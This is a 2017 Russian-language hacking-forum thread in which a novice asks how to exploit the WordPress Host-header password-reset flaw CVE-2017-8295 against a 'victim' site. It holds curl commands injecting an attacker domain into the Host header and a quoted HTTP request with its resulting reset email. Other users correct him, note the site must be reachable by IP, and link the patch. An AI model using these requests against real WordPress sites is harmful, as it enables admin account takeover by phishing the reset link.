Подскажите как воспользоваться уязвимостью Wordpress

Обсуждение в разделе «Песочница», начал(-а) itprepod, 2.11.2017.

  1. itprepod

    itprepod New Member

    Регистрация:
    2.11.2017
    Сообщения:
    7
    Одобрения:
    0
    Репутация:
    0
    Всем привет.

    Подскажите как воспользоваться уязвимостью Wordpress, описанной здесь:

    https://wpvulndb.com/vulnerabilities/8807

    я так понимаю, что это:
    curl -H "Host: www.evil.com" --data "user_login=admin&redirect_to=&wp-submit=Get+New+Password" http://example.com/wp-login.php?action=lostpassword

    Команда для терминала в линукс?
    Что должно быть вместо evil.com ?

    вместо example.com сайт жертвы?
    или наоборот?

    Разъясните пожалуйста.
     
  2. Dr_Wile

    Dr_Wile Member

    Регистрация:
    19.10.2016
    Сообщения:
    79
    Одобрения:
    28
    Репутация:
    1
    Всё верно. Команда вводится в терминал Linux, example.com - сайт жертвы. А вот что это за хост evil.com....
    В хелпе curl сказано:
    -H, --header LINE Передача пользовательского заголовка LINE на сервер (H)
     
    Это одобряет itprepod.
  3. M_script

    M_script Members of Antichat

    Регистрация:
    4.11.2004
    Сообщения:
    2 626
    Одобрения:
    1 235
    Репутация:
    906
    cURL кроссплатформенный

    Вы вообще понимаете, что эта уязвимость дает и какой код должен быть на вашем сайте (evil.com) для проведения атаки?
     
    _________________________
    Это одобряет Gorev.
  4. itprepod

    itprepod New Member

    Регистрация:
    2.11.2017
    Сообщения:
    7
    Одобрения:
    0
    Репутация:
    0
    Я так понимаю, что с помощью этой уязвимости, можно получить письмо для генерации нового пароля от аккаунта сайта (не важно он с правами админа или нет) на свою почту.

    Не знаю какой код должен быть на сайте вместо evil.com, поэтому я здесь.
     
  5. M_script

    M_script Members of Antichat

    Регистрация:
    4.11.2004
    Сообщения:
    2 626
    Одобрения:
    1 235
    Репутация:
    906
    С первой попытки не угадали. Попробуйте еще раз.


    То есть, ничего не знаете, но что-то хотите взломать? А знаете, какой срок дают за то, что вы собираетесь сделать?
     
    _________________________
  6. brown

    brown Member

    Регистрация:
    16.10.2016
    Сообщения:
    135
    Одобрения:
    3
    Репутация:
    0
    работа по ру запрещена)
     
  7. GroM88

    GroM88 Elder - Старейшина

    Регистрация:
    24.10.2007
    Сообщения:
    489
    Одобрения:
    60
    Репутация:
    21
    Это было указанно в описании к уязвимости?))
     
  8. palec2006

    palec2006 Member

    Регистрация:
    30.10.2012
    Сообщения:
    431
    Одобрения:
    469
    Репутация:
    8
    да, работайте по буржу, чтоб вас потом в грециях хватали и на 20 лет в гуантанамо засовывали
     
  9. itprepod

    itprepod New Member

    Регистрация:
    2.11.2017
    Сообщения:
    7
    Одобрения:
    0
    Репутация:
    0
    Я в целях помочь админу в закрытии уязвимости, а не в целях навредить.
     
  10. itprepod

    itprepod New Member

    Регистрация:
    2.11.2017
    Сообщения:
    7
    Одобрения:
    0
    Репутация:
    0
    Или с помощью этой уязвимости можно подменить email админа при заказе письма по восстановлению пароля?
    Вот здесь:
    https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html

    Показано, что письмо по восстановлению пароля приходит от wordpress@attackers-mxserver.com
    Вместо attackers-mxserver.com может быть любой другой домен.
    Но перед атакой получается мне нужно создать почту на домене.
    Порядок действий:
    1. Регаю домен. Пусть будет forhackwp.ru
    2. Делаю почту wordpress@forhackwp.ru
    3. Запускаю Линукс. Пишу в терминал:
    curl -H "Host: forhackwp.ru" --data "user_login=admin&redirect_to=&wp-submit=Get+New+Password" http://тут-домен-жертвы/wp-login.php?action=lostpassword
    4. Жду письма на свою почту: wordpress@forhackwp.ru ?

    Или нет?

    Вот тут:
    https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html

    Написано (перевод):

    Если злоумышленник отправляет запрос, аналогичный приведенному ниже WordPress по умолчанию
    установка, доступная IP-адрес (IP-основе виртуального хоста):

    -----[ HTTP Request ]----

    POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1
    Host: injected-attackers-mxserver.com
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 56

    user_login=admin&redirect_to=&wp-submit=Get+New+Password

    ------------------------

    WordPress будет вызвать функцию сброса пароля для учетной записи пользователя с правами администратора.

    Из-за измененного заголовка узла имя_сервера будет присвоено значение
    имя хоста по выбору злоумышленника.
    В результате WordPress передаст следующие заголовки и текст сообщения электронной почты
    /usr/bin / обертка sendmail:

    ------[ полученная электронная почта ]-----

    Subject: [CompanyX WP] Password Reset
    Return-Path: <wordpress@attackers-mxserver.com>
    From: WordPress <wordpress@attackers-mxserver.com>
    Message-ID: <e6fd614c5dd8a1c604df2a732eb7b016@attackers-mxserver.com>
    X-Priority: 3
    MIME-Version: 1.0
    Content-Type: text/plain; charset=UTF-8
    Content-Transfer-Encoding: 8bit

    Someone requested that the password be reset for the following account:

    http://companyX-wp/wp/wordpress/

    Username: admin

    If this was a mistake, just ignore this email and nothing will happen.

    To reset your password, visit the following address:

    <http://companyX-wp/wp/wordpress/wp-login.php?action=rp&key=AceiMFmkMR4fsmwxIZtZ&login=admin>

    -------------------------------

    Как сделать HTTP запрос?
     
  11. crlf

    crlf Reservists Of Antichat

    Регистрация:
    18.03.2016
    Сообщения:
    273
    Одобрения:
    377
    Репутация:
    108
    Совета по обновилению WP до последней версии, будет достаточно.

    Нет. Письмо улетит админу, но в линках и заголовках будет домен атакующего.

    Так же, должны быть соблюдены условия для успешной эксплуатации.

     
  12. itprepod

    itprepod New Member

    Регистрация:
    2.11.2017
    Сообщения:
    7
    Одобрения:
    0
    Репутация:
    0
  13. crlf

    crlf Reservists Of Antichat

    Регистрация:
    18.03.2016
    Сообщения:
    273
    Одобрения:
    377
    Репутация:
    108
    Нет.
     
  14. itprepod

    itprepod New Member

    Регистрация:
    2.11.2017
    Сообщения:
    7
    Одобрения:
    0
    Репутация:
    0
    написал в личку
     
  15. crlf

    crlf Reservists Of Antichat

    Регистрация:
    18.03.2016
    Сообщения:
    273
    Одобрения:
    377
    Репутация:
    108
    ответил
     
    Это одобряет itprepod.
  16. M_script

    M_script Members of Antichat

    Регистрация:
    4.11.2004
    Сообщения:
    2 626
    Одобрения:
    1 235
    Репутация:
    906
    Сайт должен быть доступен по IP. На хостингах и нормально настроенных серверах не сработает.

    Последняя версия 4.8.3. Она уязвима, если верить ссылке из первого поста.
     
    _________________________
    Это одобряют t0ma5 и crlf.
  17. itprepod

    itprepod New Member

    Регистрация:
    2.11.2017
    Сообщения:
    7
    Одобрения:
    0
    Репутация:
    0
    Да, сайт жертвы на хостинге, как и большинство сайтов по сути.
     
  18. crlf

    crlf Reservists Of Antichat

    Регистрация:
    18.03.2016
    Сообщения:
    273
    Одобрения:
    377
    Репутация:
    108
    Кстати, да. Кривым взлядом, принял патч за обновление :( Кому нужно, можете пропатчиться:

    https://core.trac.wordpress.org/attachment/ticket/25239/CVE-2017-8295.patch
     
Загрузка...
Похожие темы
  1. Ответы:
    3
    Просмотры:
    1 590
  2. Ответы:
    0
    Просмотры:
    865
  3. Ответы:
    0
    Просмотры:
    912
  4. Ответы:
    54
    Просмотры:
    4 250
  5. Ответы:
    0
    Просмотры:
    815
  6. Ответы:
    2
    Просмотры:
    709
  7. Ответы:
    1
    Просмотры:
    1 250